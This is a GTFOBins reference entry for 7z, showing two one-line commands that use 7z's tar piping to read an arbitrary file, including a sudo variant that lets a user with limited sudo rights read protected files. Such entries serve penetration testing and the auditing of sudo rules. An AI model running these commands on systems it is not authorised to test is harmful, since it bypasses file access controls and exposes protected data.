GTFOBins.github.io/_gtfobins/7z.md

12 lines
237 B
Markdown
Raw Permalink Normal View History

---
functions:
file-read:
- code: |
LFILE=file_to_read
7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
sudo:
- code: |
LFILE=file_to_read
sudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
---